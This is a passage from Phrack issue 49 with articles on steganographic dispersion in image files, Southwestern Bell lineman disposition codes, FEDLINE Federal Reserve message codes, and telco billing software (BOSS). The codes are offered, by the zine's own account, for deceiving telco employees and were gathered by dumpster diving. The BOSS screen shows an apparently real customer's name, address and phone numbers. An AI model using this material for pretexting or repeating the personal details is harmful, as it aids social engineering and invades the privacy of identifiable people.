 if (j>=BUFFERSIZE)
  {
  fprintf(stderr,"File too big
");
  return(0);
  }
 if (buffer[i]=='
')
  *(s+(j++))='
';
 *(s+(j++))=buffer[i++];
 }
*(s+j)=0;
return(1);
}

---------------8<-------cut me loose!-------------->8--------------------------




--------------------------------------------------------------------------------


                              .oO Phrack 49 Oo.

                        Volume Seven, Issue Forty-Nine

                                  10 of 16
  
	
              A Steganography Implementation Improvement Proposal

			    by: cjm1@concentric.net 

[ 	For those of you who do not know, steganography is cryptographic
technique that simply hides messages inside of messages.  The sender composes
an innocuous message and then, using one of many tactics, injects the secret
message into it.  Some techniques involve: invisible inks, character 
distortion, handwriting differences, word/letter frequency doping, bit 
flipping, etc...  The method the author discusses hinges upon a well known
steganographic implementation, low-order bit flipping in graphic images. -d9 ]

	Steganography is a technique for hiding data in other data.  The 
general method is to flip bits so that reading the low-order bit of each of
8-bytes gets one a character.  This allows one to use a picture or a sound
file and hide data, resulting in a small bit of hopefully unnoticeable noise 
in the data and a safely hidden cache of data that can later be extracted.
This paper details a method for making steganographically hidden data more
safe, by using pseudo-random dispersion.
	
	Ordinarily, if someone suspects that you have data hidden in, say, a
GIF file, they can simply run the appropriate extractor and find the data.  If
the data is not encrypted, it will be plain for anyone to see.   This can be
ameliorated by using a simple password protection scheme, hiding the password
in the GIF as a header, encrypting it first with itself.  If someone does not
know the password, they cannot extract the data.  This is of course reasonably
safe, depending on the encryption scheme used, and I recommend it.  But, the
hidden data can be made even safer.
	
	Pseudo-random dispersion works by hiding a password, and a seed for a
random-number-generator in the encrypted header.  then, a random number of bytes
are passed by, before a low-order bit is flipped. 
	
	To do this, one must first calculate how many bytes a bit can take up 
for itself.  For instance, to hide an 800 character message in a GIF would 
mean each character needs 8 bytes (8 bits per character, 1 byte per low-order 
bit), so you need 6,400 bytes of data to hide the message in, 8 bytes per 
character.  Let's say we have a GIF that is 10 times this size: 64,000 bytes.
Thus we have 80 bytes per character to hide data in.  Since each bit takes a 
byte, we have 10 bytes per bit to hide data in!  Therefore, if we take a 
pseudo-random number between 1 and 10, and use that byte to hide our low-order
bit in, we have achieved a message dispersed through the GIF in a pseudo-random
fashion, much harder to extract.  A message in which each byte has a bit which
is significant to the steganographically hidden message can be extracted with 
ease relative to a message in which there are 10 possible bytes for each bit
of each character.  The later is exponentially harder to extract, given no
esoteric knowledge.
	
	A slight improvement can be made to this algorithm.  By re-calculating
the number of available bytes left for each bit after each bit is hidden, the 
data is dispersed more evenly throughout the file, instead of being bunched up
at the start, which would be a normal occurrence.  If you use pseudo-random
number generator, picking numbers from 0-9, over time, the values will smooth 
to 5.  This will cause the hidden message to be clustered at the beginning
of the GIF.  By re-calculating each time the number of available bytes left
we spread the data out throughout the file, with the added bonus that later 
bits will be further spread apart than earlier ones, resulting in possible
search spaces of 20, 30, 100, or even 1,000 possible bytes per bit.  This too
serves to make the data much harder to extract.
	
	I recommend a header large enough for an 8 character ASCII password,
an integral random-number seed, an integral version number, and an place 
holder left for future uses.  The version number allows us to tweak the 
algorithm and still be able to be compatible with past versions of the 
program.  The header should be encrypted and undispersed (ie: 1 byte per 
bit of data) since we haven't seeded the random-number generator yet for 
dispersion purposes.
	
	It is useful to make the extractor in such a way that it always 
extracts something, regardless of the password being correct or not.  Doing
this means that it is impossible to tell if you have guessed a correct password
and gotten encrypted data out, or merely gotten out garbage that looks like
encrypted data.  Use of a password can also be made optional, so that none is
necessary for extraction.  A simple default password can be used in these 
cases.  When hiding encrypted data, there is no difference to the naked 
eye between what is extracted and what is garbage, so no password is 
strictly necessary.  This means no password has to be remembered, or 
transmitted to other parties.  A third party cannot tell if a real password 
has been used or not.  It is important for safety purposes to not hide the 
default password in the header if no password is used.  Otherwise, a simple 
match can be made by anyone who knows the default password.



--------------------------------------------------------------------------------


                               .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine

                                    11 of 16


                A listing of South Western Bell Lineman Work Codes

                         Written by: Icon

        Have you ever wanted to bullshit a telco employee but you don't 
have the proper acronym or code that would help convince them?  Well here 
is a nearly complete listing of all of the Disposition Codes that I found 
on a trash run.  Enjoy...

         
		-= Disposition Codes =-


[The following is an exact word for word type up]

Disposition Code 01XX - Station Set, Business Services:
This code applies to all troules located in TELCO-provided station set 
equipment, including the mounting cord and handset cord, when used for OCS
classes of service.

Disposition Code 02XX - Other Station Equipment, OSC Business Services 
(or Public Services):
This code applies to all troubles in station equipment (other than station 
sets) including switchboards, PBX systems, switching equipment on the 
customer premises, etc. and to Public Services (COIN) station equipment.

Disposition Code 03XX - Station Wiring
0310 Premise Termination: Coin/Coinless
0370 Network Termination: Other
0371 Protector: Applies when trouble is located in a protective interface
0373 Network Interface: Applies when trouble is located in network interface
0375 Network Terminating Wire: Applies when trouble is located in the wire 
     between the protector/cable termination and the network interface of
     demarcation
0378 Side Wall - Jumper missing
0379 Side Wall - Jumper wrong
0380 Drop Other
0381 Aerial-Paired: Applies to trouble located in one-pair aerial drop 
     service wire
0382 Aerial-Multiple: Applies to trouble located in multiple-paired aerial
     drop service wire 
0383 Buried Drop - Repaired Initial Dispatch: Applies to trouble located in
     buried drop and total repaired on first dispatch
0384 Buried Drop - Temporary Places, No Recon: Applies to trouble located in
     buried drop and a subsequent visit is not needed for drop retermination
0385 Buried Drop - Temporary Placed, Recon Required: Applies to trouble 
     located in buried drop and a subsequent visit is needed for drop 
     placement and recon.
0386 Drop, Left In: Applies to trouble located in a drop terminated to the
     cable pair at a location other than that of the subscriber's
0387 Drop Reversed
0388 Buried Drop - Drop Not Buried: Applies when temporary drop is removed 
     and newly placed buried drop is reconned
0389 Temporary Drop Not Buried - Repaired: Applies to trouble located in the 
     temporary drop and it is repaired
0390 Network Miscellaneous Apparatus

Disposition Code 04XX - Outside Plant
0401 Pair Transferred - Defective Pair Left: Applies when service is restored
     by transferring the customer's service to a different cable pair and the
     original defect is not corrected.
0402 Pair Cut Dead To The Field: Applies when service is restored by removing
     faulted conductor bridge tap which has affected the customer's service
     and the original defect is not corrected
0403 Pair Transposed: Applies when conductors are transposed between two or 
     more points to restore customer service and the original defect is not
     corrected
0404 Defective Section/Temporary Drop Placed: Applies when trouble is located
     and a drop is placed as a temporary cable between terminals.
0405 Defective Pair - Encapsulated Plant: Applies when trouble is 
     encapsulated plant and pair is not fixed
0407 Pair Transferred - No Defective Pair Left: Applies when service is 
     restored by transferring the customer's service to a different cable pair
     (usually for record purposes) and no defective pair is involved (i.e., 
     pair left off cable transfer, telephone number assigned on wrong pair).
0410 Cable Other: Applies when the trouble is fixed in the cable facility not
     listed elsewhere
0411 Sheath: Applies when damaged cable sheath or turnplate must be repaired 
     to clear a trouble report
0412 Cut Cable: Applies when a cable has been cut or damaged and must be 
     repaired to clear trouble reports
0413 Wet Cable: Applies when a cable has gotten wet and must be dried and/or
     cutaround to clear trouble reports
0416 Conductor: Applies when trouble is located in cable conductors, such as 
     defective insulation, etc.
0420 Closure/Splice Case: Applies when trouble is located in cable closures
     and splice cases
0421 Temporary Closure: Applies to trouble located in temporary type closures
0423 Encapsulated: Applies to a trouble located within an encapsulated splice
     or closure. Includes troubles resulting from a defect in material,
     workmanship during construction, or maintenance activities of an 
     encapsulated splice
0426 Ready Access Splice Case: Applies to trouble found in a ready access 
     type splice case
0430 Terminal - Other: Applies to trouble found in a terminal not otherwise
     listed
0431 Ready Access Terminal, All: Applies to trouble found in ready access 
     type terminals in aerial or buried plant
0433 Fixed Count Terminal, All: Applies when trouble is located in fixed 
     count terminal in aerial or buried plant
0436 Cross Box, RAI/SAI: Applies when trouble is located in a serving area
     interface or FX box
0440 Wire/Dual Plant - Other: Applies when trouble is located in wire or dual
     wire plant not elsewhere listed
0442 Open/Rural Wire: Applies when trouble is located in wire for 
     distribution, i.e., open wire, c-rural wire, and d-underground wire
0470 Pair Gain System: Applies when trouble is located in the Remote Terminal
     of the pair gain system
0471 Repeater Failure: Applies when trouble is located in the repeater of a 
     Pair Gain System
0472 Battery Failure: Applies when trouble is located in the battery of a 
     Pair Gain System
0473 Common Circuit Pack: Applies when trouble is located in the common  
     circuit pack of a Pair Gain System
0474 Channel Unit Exchange: Applies when trouble is located in the channel
     unit (exchange type)
0475 Channel Unit Special: Applies when trouble is located in the channel 
     unit (special type)
0476 Routing: Applies when trouble is with the routing
0477 Rectifier Failure: Applies when trouble is caused by rectifier failure
0478 Wiring: Applies when trouble is caused by the wiring
0470 Commercial Power Failure: Applies when trouble is caused because of 
     commercial power failure
0480 Cable Miscellaneous/Other
0481 Pole/Guy/Anchor/Trench: Applies when a trouble is the result of a pole,    
     guy, anchor, route signs, or trench associated with outside plant
0483 Fiber Optics - All: Applies when a trouble is the result of conditions
     associated with fiber optics

Disposition Code 05XX - Central Office
0511 Common Equipment 
0512 Linkage/Network/Grid
0513 Line Equipment
0514 Billing Equipment
0515 Trunk
0516 Public Service Trunk
0520 Translations - Other
0521 Generic Work Error
0522 Generic Program Error
0523 Parameter - Work Error
0524 Parameter - Document Error
0525 Line - Work Error
0526 Line - Document Error
0527 Network - Work Error
0528 Network - Document Error
0530 Intercept or Disconnect Document Error
0531 MDF Cross-Connection Missing
0532 MDF Cross-Connection Broken
0533 MDF Cross-Connection Work Error
0534 MDF Cross-Connection Document Error
0535 Other Cross-Connection Work Error
0536 Other Cross-Connection Document Error
0537 Billing Cross-Connection Work Error
0538 Billing Cross-Connection Document Error
0539 Intercept or Disconnect Work Error
0540 Other Frame
0541 Defective or operated protector
0542 Missing Protection Device
0543 Reversing Device
0544 Terminal - Wire Clipping
0545 Terminal Connection
0546 Test Cord
0550 Other Power
0551 DC Power Equipment
0552 AC Power Equipment
0553 Ringer Plant
0554 Standby Emergency Power
0560 Miscellaneous Equipment - Other
0561 Radio System
0562 Line Testing Equipment
0563 Concentrator
0564 Range Extender - Applies when a report is the result of a defective 
     range extender
0565 Carrier System
0566 Automatic Message Accounting Recording Center
0580 Pair Gain System/RSS Other
0583 Common Circuit Pack
0584 Channel Unit Exchange
0585 Channel Unit Special
0586 Carrier Unit Replaced (AML/SLC-1)
0587 Power
0588 Wiring

Disposition 06XX - Customer Action
0600 Customer Action: Applies when a trouble report results from customer 
     error or misuse of features in connection with custom calling service

Disposition 07XX - Test OK
0701 MC Retest Ok
0708 SCC Test Ok
0711 Test OK (Maintenance Center Use Only)
0715 Customer Cancel Original (CSB Use Only)
0717 Lead Test Ok
0720 Link Retest Ok
0730 Test OK TAN (Technician Use)
0747 Test OK (Front End Closeout)
0750 CSB Retest OK

Disposition Code 08XX - Found OK - In
0800 Found OK - In

Disposition Code 09XX - Found Ok - Out
0901 Found OK - Out, Non-Cable: Applies when trouble condition is determined
     to be FOK between the serving terminal and the customer's side of the 
     protector/network interface
0910 Found Ok - Out, Cable: Applies when trouble condition is determined to 
     be FOK between the serving terminal and the field side of the central
     office

Disposition Code 10XX - Referred Out
1001 Referred Out: Applies when trouble reports are referred to other 
     Maintenance Centers, agencies or departments not normally involved in
     the trouble clearing effort

Disposition Code 12XX - Customer Provided Equipment
120X Voice Messaging Service
1201 Voice Messaging Service 0 All
121X Maintenance Contract (Inline/Inline Plus)
1210 Cord: Customer has maintenance contract and a defective mounting cord was
     replaced
1211 Loaner Set Provided: Applies to those customers with an inline+ 
     agreement, in which a loaner set is provided, or when the customer 
     chooses to buy the replacement set
1212 Inline Only - Set Trouble: Applies to customer with a maintenance 
     agreement for IW only and the trouble is located in the set/equipment.
     This code includes, but is not limited to receiver off hook, unplugged
     sets, defective sets
1213 Non-Standard IW (Customer Repair): Applies when the customer has an 
     agreement for standard IW maintenance; however, the trouble is located
     in non-standard IW and the customer will repair. NO CHARGE
1214 Inside Wire: Applies to customers with an IW maintenance agreement and 
     the technician repairs the IW. NO CHARGE
1215 Non-Standard IW (Telco Replaced): Applies when the customer has a 
     maintenance contract for standard IW maintenance; however, the trouble is 
     located in non-standard IW and the technician will repair. PREMISES
     WORK CHARGE IS APPLICABLE
1217 No Access - Field Use: Applies on second no access, no trouble is found
     at the customer premise
1218 Inline/Inline Plus - Telco Fix Exceptions: Wire repair due to acts of 
     God, such as floods, earthquake, riot, gross negligence, willful 
     damage/vandalism. Also wire that does not meet SWBT installation practice
     technical standards, or is not in satisfactory condition
1219 Inline/Inline Plus - Customer Fix - Exceptions (See 1218 for exceptions)
122X CPE - Other (No Maintenance Contract)
1220 Radio Suppresser (Inline Customer): Applies when a radio suppresser is 
     placed to resolve the trouble
1221 Calling Party Hold: Applies when the trouble condition is a result of 
     calling party hold. NO CHARGE
1222 Set/Equipment: Applies when then trouble condition is determined by the
     technician to be caused by the customer telephone set/equipment. No
     maintenance agreement. A MAINTENANCE OF SERVICE CHARGE WILL APPLY
1223 CPE (IW/CPE) No Dispatch: Applies when trouble is tested, but is 
     determined to be in CPE via conversation with the customer and/or related tests. No repair dispatch is made. NO CHARGE
1225 Receiver Off Hook: Applies when trouble is tested when cannot be located
     in Telco facilities and the trouble report or service condition can be
     attributed to a receiver off hook. MSC WILL APPLT
1226 Set Unplugged: Applies when trouble is tested which cannot be located in
     Telco facilities and the trouble report or service difficulty can be
     attributed to unplugged CPE. MSG WILL APPLY
1227 Public Extension (SEMI): Applies when trouble is tested which cannot be 
     located in TELCO facilities and the trouble report or service condition
     can be attributed to semi-public extension. Semi-public extension is
     defined as a CPE instrument used as an extension on Telco provided coin
     service. MSC WILL APPLY
1228 Private Coin Service: Applies when trouble is tested which cannot be 
     located in Telco facilities and the trouble report or service condition
     can be attributed to private coin service. Private coin service is 
     defined as a coin instrument and associated wire provided by a non-Telco
1229 Cable Facilities (Not Telco Maintained): Applies when trouble is tested
     which cannot be located in Telco facilities and the trouble report or 
     service condition can be attributed to CPE cable facility. MSC WILL APPLY
123X Intexchange Carrier
1231 Intexchange Carrier: Applies when trouble is tested which cannot be 
     located in Telco facilities or equipment and the services are provided
     by an IC
124X Unauthorized CPE/Usage/Tariff Violation
1241 Dispatched trouble reports involving CPE that were installed under 
     Contract I/M services, and are within the warranty time period, should
     be closed to disposition code 12410 Contract I/M services, CPE. The 
     disposition code 122X should not be used under these circumstances. NO
     REPAIR CHARGE (MSR or RSC) or TIME SENSITIVE CHARGES APPLY
1242 Dispatched trouble reports involving inside wire within the warranty time
     period of the Contract I/M Services contract between SWT/SWBT should be 
     closed to the appropriate disposition code 121X. Inside wire troubles 
     reported by Non-Inline and Non-Contract I/M Services customers should 
     continue to be closed to the appropriate disposition code 126X and
     normal charges should apply.

Disposition 12XX - Customer Provided Equipment 
126X Time Sensitive Work/Isolation/No Maintenance Contract
1261 Inside Wire - Telco Repair: Applies when trouble is tested which cannot
     be located in Telco facilities and a trouble report or service condition
     is attributed to the IW. The technician repairs the IW for an ADDITIONAL
     CHARGE to the customer. (Time Sensitive - Repair Rates).
1262 Inside Wire - SNI Not Available Cust Fix (Non-Inline): Applies when
     trouble is tested which cannot be located in Telco Facilities and the
     trouble report is isolated to the customer's side of the protector. The
     technician installs a Network Interface but does not repair the trouble
1263 Inside Wire - SNI Available - Cust Fix (Non-Inline): Applies when trouble
     is tested which cannot be located in Telco facilities and a trouble 
     report or service condition is in attributed to the CPE. A Network 
     Interface is in place and the customer does the repair
1264 No Authorization/Customer Repair: Applies when trouble is tested which 
     cannot be located in Telco facilities and a trouble repor or service 
     condition can be attributed to CPIW. Premise access is obtained and 
     customer/customer's agent is unable to authorize repair charge.
1265 Military Facility: Applies when trouble is isolated to I/W maintained by
     military maintenance personnel.
1266 NA for Non-Inline (Field Use)
1267 CPE - No Access Subscriber Follow-up (MC USE ONLY): Applies when trouble
     cannot be located in Telco facilities and a trouble report or service 
     condition is attributed to the CPE. The technician does not have access
     to the customer's premise, but a network interface is present.
1268 Warranty: Applies when trouble is tested which cannot be located in 
     Telco facilities but repair work is performed by the technician within
     30 days of previous IW repair performed by Telco. (Proof of warranty is
     the customer's responsibility). A SERVICE CHARGE IS NOT APPLICABLE
127X Administrative Reports - Do Not Bill
1275 Predictor/Scan/CPR: Applies when a trouble condition is detected by SCAN/ 
     PREDICTOR or Calling Party Report, a dispatch is made and no work is 
     performed. The trouble condition is attributed to the CPE. (A SERVICE
     CHARGE IS NOT APPLICABLE)
128X CSB Use Only
1281 Front End Close Out (Customer Service Bureau Only): Apples when a
     trouble report is determined to be caused by the CSB. The CSB will close
     out this report with this disposition code.
Disposition Code 129X MOOSA (Maintenance Center Use Only)
1291 MOOSA Error Corrections

Disposition Code 13XX
1301 Other Departments - Telco
1302 Non Telco
1303 Wrong Number Reported
1325 Service Order Worked - Link
1326 Service Order Cancel/Delay
1327 Service Order Changes

Disposition Code 20XX - Air Pressure
2010 Transducer
2011 Contactor
2012 Pressure Plug
2013 Air Flow Sensor
2014 Pipe
2015 Manifold or Tubing
2016 Dryers
2017 Air Bottles
2018 Fittings

Disposition Code 30XX - Cable Location
3010 Patrols and Inspections
3011 Facility Located
3012 No Facilities In Area




--------------------------------------------------------------------------------


                              .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine

                                    12 of 16


============================================================================

                    FEDLINE (Message and Code Definitions)

                  Your PC Window to the Federal Reserve Bank
                                               
                                by ParMaster


============================================================================




    The FEDLINE software package is a common Bank client for the Federal
Reserve.  Used by Banks, Credit Unions, and other Financial Institutions,
the amount of funds transferred on a daily basis matches or exceeds the 
daily volume of all other EFT networks.  FEDLINE uses hardware encryption
through a special PC card which operates using the US National Bureau of 
Standards, Data Encryption Standard.  This file is not my attempt to 
demystify its operation, but to provide a categorical list of the codes.  
I accept no responsibility for anyone's use or misuse of the information 
contained in this file.


============================================================================


                        Type and Subtype Code Definitions
                           
============================================================================




Funds Transfer Messages.
                           

Accounting status of a message indicates how the message is
to be processed into the FUNDS balances of the FEDLINE Reserve
Account Monitor from the standpoint of the original DI.

  Status Codes:
                                D = Debit Transaction
                                C = Credit Transaction
                                N = Non-accountable Transaction

                                (Valid for ALL Messages.)


============================================================================




                        Regular Funds Transfer Messages


Type/Sub                  Acct. Status            Description
~~~~~~~~                  ~~~~~~~~~~~~         ~~~~~~~~~~~~~~~~~~~~~~~~~~~
1000                          D                   Transfer of Funds

1001                          N                   Request for Reversal
                                                  of current day Funds
                                                  Transfer

1002                          D                   Transfer of Funds
                                                  Reversal

1003                          D                   Transfer of Funds Return
                                                  (Sent by FRB only)

1007                          N                   Request for Reversal of
                                                  Prior Day Funds Transfer

1008                          D                   Prior Day Transfer of
                                                  Funds Reversal

1020                          D                   Transfer of Funds
                                                  Requiring As-Of
                                                  Adjustment

1031                          N                   Request for Customer
                                                  Drawdown

1032                          D                   Transfer Honoring Request
                                                  for Customer Drawdown

1033                          N                   Refusal of Request for
                                                  Customer Drawdown

1040                          D                   Structured Transfer
                                                  of Funds.

1090                          N                   Service Message regarding
                                                  Funds Transfer


============================================================================





                        Foreign Funds Transfers


Type/Sub                  Acct. Status            Description
~~~~~~~~                  ~~~~~~~~~~~~         ~~~~~~~~~~~~~~~~~~~~~~~~~~~

1500                            D                 Transfer of Funds

1501                            N                 Request for Reversal of
                                                  Current Day Foreign
                                                  Account Transfer

1502                            D                 Transfer of Funds
                                                  Reversal

1503                            D                 Transfer of Funds
                                                  Return
                                                  (Sent by FRB only)

1507                            N                 Request for Reversal of
                                                  Prior Day Foreign Account
                                                  Transfer

1508                            D                 Prior Day Transfer of
                                                  Funds Reversal

1531                            N                 Foreign Account Request
                                                  for Funds

1532                            D                 Transfer Honoring
                                                  Request for Funds

1533                            N                 Foreign Account Refusal
                                                  of Request for Funds

1540                            D                 Structured Funds Transfer

1590                            N                 Service Message regarding
                                                  Foreign Account Transfer


============================================================================





                        Settlement Funds Transfer Messages


Type/Sub                  Acct. Status            Description
~~~~~~~~                  ~~~~~~~~~~~~         ~~~~~~~~~~~~~~~~~~~~~~~~~~~
1600                            D                 Transfer of Funds

1601                            N                 Request for Reversal of
                                                  Current Day Settlement
                                                  Transfer

1602                            D                 Transfer of Funds
                                                  Reversal

1603                            D                 Transfer of Funds
                                                  Return
                                                  (Sent by FRB only)

1607                            N                 Request for Reversal of
                                                  Prior Day Settlement
                                                  Transfer

1608                            D                 Prior Day Transfer of
                                                  Funds Reversal

1620                            D                 Funds Transfer Requiring
                                                  As-Of Adjustment

1631                            N                 Request for Bank-to-Bank
                                                  Drawdown

1632                            D                 Transfer Honoring Request
                                                  for Bank-to-Bank Drawdown

1633                            N                 Refusal of Request for
                                                  Bank-to-Bank Drawdown

1640                            D                 Structured Transfer of
                                                  Funds

1690                            N                 Service Message regarding
                                                  Settlement Transfer

3004                            N                 Check Return Item
                                                  Notification

3006                            N                 Check Return Item
                                                  Cancellation

3009                            N                 Check Return Item
                                                  Duplicate Notification

3090                            N                 Check Return Item
                                                  Service Message


============================================================================





                        Securities Transfer Messages.


Accounting status of message indicates how the message is to be
processed into the SECURITIES balances of the FEDLINE Reserve Account
Monitor from the standpoint of the original DI. For Securities
messages, this should indicate the direction of the Cash side of the
transaction.

Type/Sub                  Acct. Status            Description
~~~~~~~~                  ~~~~~~~~~~~~         ~~~~~~~~~~~~~~~~~~~~~~~~~~~
2000                            C                 Security Transfer Message

2001                            N                 Request for Reversal of
                                                  Security Transfer

2002                            C                 Reversal of Security
                                                  Transfer

2008                            N                 Request for Shipment of
                                                  Definitive Agency
                                                  Securities

2090                            N                 Service Message regarding
                                                  Securities Transfer

2500                            C                 Original Issue (OI)
                                                  Transfer
                                                  (Sent by FRB or
                                                   Agency only)

2501                            N                 Request for Reversal of
                                                  OI Transfer

2502                            C                 Reversal of OI Transfer

2590                            N                 Service Message regarding
                                                  OI Transfer

2700                            C                 Government Agency
                                                  Securities Charge
                                                  (Sent by FRB or
                                                   Agency only)

2705                            C                 Adjustment to Government
                                                  Agency Securities
                                                  (Sent by FRB or
                                                   Agency only)

2790                            N                 Service Message regarding
                                                  Government Agency
                                                  Securities Charge

2800                            D                 Government Agency
                                                  Securities Credit
                                                  (Sent by FRB or
                                                   Agency only)

2805                            D                 Adjustment to Government
                                                  Agency Securities
                                                  (Sent by FRB or
                                                   Agency only)

2890                            N                 Service Message regarding
                                                  Government Agency
                                                  Securities Credit

8200                            N                 Conversion of Security
                                                  from BE to Bearer

8202                            N                 Reversal of BE to Bearer
                                                  Conversion
                                                  (Sent by FRB or 
                                                   Agency only)

8800                            N                 Conversion of Security
                                                  from BE to Registered

8802                            N                 Reversal of BE to
                                                  Registered Conversion
                                                  (Sent by FRB or
                                                   Agency only)

8900                            D                 Maturity Payment
                                                  (Sent by FRB or 
                                                   Agency only)

8906                            D                 Interest Payment
                                                  (Sent by FRB or 
                                                   Agency only)

8990                            N                 Service Message regarding
                                                  Maturity and Interest
                                                  Payments




============================================================================





                        Message Status Codes


  A list of status codes that may appear on the bottom of your screen
  while processing messages:


ENTRY CODES - assigned when a message is entered or intentionally
              withheld from transmission for a variety of reasons,
              such as insufficient Local Reserve Account Monitor
              funds. Includes messages which are not verified,
              or warehoused for future transmission.


                            ET  Entered Transaction
                            EH  Entered to be held
                            EW  Entered to be Warehoused
                            MC  Marked for Correction
                            MS  Marked for safe-stored
                           
                           
HELD CODES - assigned when a message is intentionally detained from
             further processing until a FEDLINE operator releases it.


                            HT Held Transaction (by operator)
                            HS Held by supervisory order
                            HM Held by account monitor
                            HO Held because terminal is off-line


LOCAL COMPLETION CODES - assigned when a message has been warehoused and
                         verified or canceled.


                            VW Transaction Warehoused
                            CN Transaction Canceled
                            DN Done


TRANSMISSION CODES - assigned when a message is ready for transmission or
                     after transmission has been completed.  
                     The transmission status of a message is updated by
                     Short Acknowledgments and responses from the
                     host computer.


                            TQ Queued for Transmission
                            TC Transmission Completed
                            TH Transmission rejected by host
                            TU Transmission Unconfirmed
                            TA Transmitted and Accepted
                            TR Transmitted and rejected
                            TI Transmitted but intercepted


============================================================================





                        Batch Status Codes

  The following list of status codes describes the processing condition
  of an ACH batch.  A status code appears in the upper right corner of
  the ACH batch header and batch balancing screens, as well as the
  Return Item and Notification of Change screens. Status codes can be
  used to retrieve batches from the Batch Selection Criteria Screens for
  further processing.


Entry Codes - assigned when a batch is created. Includes all batches which
              are balanced and ready for collection.
 
 
                            ET Entered
                            VR Verified / Balanced
                           
                           
Local Completion Codes - assigned when a batch has been canceled


                            CN Canceled
                           
                           
Transmission Codes - assigned when a batch is selected and queued for    
                     transmission. Includes batches that were not
                     transmitted due to an error.


                            CL Collected
                            IP Interrupted Processing
                           
                           
============================================================================





                        File Status Codes

    The following list of status codes describes the processing
    condition of ACH files.


Entry Codes - assigned when a file is created or received.
 
 
                            ET File Created 
                            RC File Received 


Local Completion Codes - assigned after an incoming file has been processed
                         from the FRB.


                            RP File Received and Processed


Transmission Codes - assigned when a file is queued for transmission or
                     after transmission has been completed.  Includes
                     files which were not transmitted due to some
                     processing error.
 
 
                            TQ File created and queued in PC
                            TC Transmitted complete to host queue
                            IP Interrupted Processing


============================================================================


--------------------------------------------------------------------------------


                              .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine

                                    13 of 16



                .-----------------------------------------.
                | Telephone Company Customer Applications |
                |-----------------------------------------|
                |            Voyager[TNO]                 |
                `-----------------------------------------'


Telco's use many types of software.  In addition to the run-of-the-mill
employee applications such as OfficeVisions, PROFS, and the usual trashy
selection of DOS/Win applications, telco's use two types of much more
interesting software:

	. Customer applications
	. Provisioning applications

Customer applications are used by telco personnel to deal with customer
issues, such as billing and service orders.  Provisioning applications are
used to deal with the actual phone network itself.

Customer applications include BOSS, CARS, CORD, SOLAR, SOPAD, OSCAR, and
PREMIS.  Provisioning applications include FACS, March, April, COSMOS,
Switch and FOMS/FUSA.

Most of what has been written regarding telco software covered provisioning
applications.  While much can be done with provisioning applications, you
will soon see the incredible opportunities offered by Customer
Applications.  Within the family of Customer Applications you will find the
ability to locate personal information, look up addresses by telephone
number, and modify customer bills.

Experienced dumpster divers will recognize many of the screens shown in
this article.



                .------------------------------.
                | Part I: Billing Applications |
                `------------------------------'

BOSS
~~~~
BOSS (Billing and Order Support System) contains bill and credit
information, equipment information, carrier billing information, customer
contact notes and payment history.  BOSS is used in the Central and Eastern
Territories of U.S. West.  To login to BOSS, you must enter your a ID, a
two character alphanumeric office code, and a five character password.
BOSS passwords expire after 30 days and cannot be re-used.

BOSS is operated largely with PF keys:

	PF1  = ENTRY	(Entry Screen)
	PF2  = BILL	(Entity and Summary Bill)
	PF3  = IC	(Itemized Calls)
	PF4  = OCC	(Other Charges and Credits)
	PF5  = CSR	(Customer Service Record)
	PF6  = PREV	(Previous Months Bill)
	PF7  = NEXT	(Next)
	PF8  = Note	(Notations)
	PF9  = ASUM	(Adjustments Summary)
	PF10 = COMPUTE	(Compute)
	PF11 = F/B	(Forward/Back)


PF2 will bring up the Billing Screen, which will show you the contact names
and telephone numbers for the account you are looking at.  The CSBL screen
is completely covered with information, and it is impossible to get
everything out of it without careful study.  There are at least two
versions of BOSS in use, this screen is a mix of the two that I am familiar
with:

+-----------------------------------------------------------------------------+
|CMD                                    MSG COMMAND COMPLETED (I210)          | 
|(a)303 265 8545 (b)153 (c)NP (d)JAN 16 93 *CSBL (e)LIVE       (f)DNV (g)1FR  |
|(h)DARIN STOREY         (i)PB 0205 (m)RT     (q)AC D-00 (t)DEP 0 CN  (x)BD N |
|515-D GIRARD BLVD S E   (j)R1 0126 (n)ES     (r)CT      (u)DOI 030492 (y)LCU |
|BOULDER CO        80301 (k)R2 0216 (o)NT C A (s)NOB     (v)TAX FSLCF- (z)LCR |
|                        (l)R3 0224 (p)PPD               (w)TAR AJ     (A)LAL |
|                       (B)CI   SEARS  SUPVSR 2426767 MS  SANDI SM POE NLR    |
|DAD MICHAEL STOREY 2755595                        (C)CBR                     |
|        (D)SSN           (E)VL (F)TRT HIST 059511111111      (G)CIV 0290     |
|                               (H)RCK HIST 000000000000  (I)PAH              |
|                            PREV BL    168.55       CUR BL      116.24       |
|                             PAY & ADJ PREV BILL    PAY AND ADJ CURR BILL    |
|                            DATE  T     AMOUNT     DATE  T       AMOUNT      |
|                             1223 01   101.15                                |
| (J)010        30.42                                                         |
|    221         9.03                                                         |
|    300         9.39                                                         |
| (K)CCG        48.84                                                         |
| (L)BAL        67.40                                                         |
| (M)TOT       116.24                            (N)CUR DUE    116.24         |
| (O)RP  (P)NOTATION                    (Q)TYPE  (R)PN  (S)ACT  (T)FU  (U)BD  |
|                                                                   0193 (V)+ |
+-----------------------------------------------------------------------------+

Legend:	
        (a) Telephone number
	(b) Customer code
	(c) Listing Type		(See below)
	(d) Most current bill date
	(e) Account Status Code		(See below)
	(f) Alpha code for the serving exchange
	(g) Class of service		(See below)
	(h) Billing name
	(i) Pay-By-Date, month and day payment is due
	(j) Previous months denial date
	(k) Date first collection notice is sent out
	(l) Date account will be denied and referred to CMC
	(m) Remove from treatment amount
	(n) Entity Status		(See below)
	(o) No Treatment Indicator	(See below)
	(p) Preferred Payment Date
	(q) Account Classification (credit classification)
	(r) Carryover Treat History (unimplemented)
	(s) Number of bills the customer receives
	(t) Total deposit held on the account 
	(u) Date of Installation
	(v) Tax Code
	(w) Tax Area Code
        (x) Bank Draft
	(y) Local Units Used (unimplemented)
	(z) Local Usage Units Credited (unimplemented)
	(A) Local Usage Units Allowed (unimplemented)
	(B) Credit Information
	(C) Can Be Reached 
	(D) Social Security Number
	(E) Central Office is Voice Link capable
	(F) Treatment History (read right to left)
	(G) Credit Information Verified (date CI was last verified)
	(H) Returned Check History (read right to left)
	(I) Previous Account History
	(J) Charges by Entity (charges from AT&T, MCI, etc...)
	(K) Current Charges
	(L) Balance from the previous bill
	(M) Total 
	(N) Current Due
	(O) Responsible Party
	(P) Notation
	(Q) Type code
	(R) Position Number (BOSS user position number)
	(S) The action to be taken
	(T) Follow-up date
	(U) Bill Date
        (V) Notation Indicator (+ means there are display pages of notations)
